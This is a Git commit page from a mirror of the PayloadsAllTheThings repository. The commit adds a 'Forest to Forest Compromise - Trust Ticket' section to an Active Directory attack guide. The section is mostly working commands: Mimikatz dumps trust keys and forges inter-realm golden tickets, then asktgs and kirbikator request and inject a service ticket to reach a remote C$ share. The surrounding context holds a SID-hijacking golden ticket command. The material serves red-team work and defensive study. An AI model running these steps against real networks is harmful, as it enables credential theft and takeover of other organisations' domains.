ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-29 14:45:04 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

AD - Forest to Forest compromise

Browse Source
This commit is contained in:
Swissky 2020-08-18 09:33:38 +02:00
parent 6e526de7b4
commit cc95f4e386
1 changed files with 32 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
Methodology and Resources/Active Directory Attack.md
View File

@ -52,6 +52,7 @@
- [WriteDACL](#writedacl)
- [Trust relationship between domains](#trust-relationship-between-domains)
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
- [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket)
- [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
- [Kerberos Constrained Delegation](#kerberos-constrained-delegation)
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
@ -1242,6 +1243,37 @@ Prerequisite:
kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
```
### Forest to Forest Compromise - Trust Ticket
#### Dumping trust passwords (trust keys)
> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing “$” are computer accounts, but some are trust accounts.
```powershell
lsadump::trust /patch
or find the TRUST_NAME$ machine account hash
```
#### Create a forged trust ticket (inter-realm TGT) using Mimikatz
```powershell
mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi
```
#### Use the Trust Ticket file to get a TGS for the targeted service
```powershell
./asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
```
Inject the TGS file and access the targeted service with the spoofed rights.
```powershell
kirbikator lsa .\ticket.kirbi
ls \\machine.domain.local\c$
```
### Kerberos Unconstrained Delegation
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html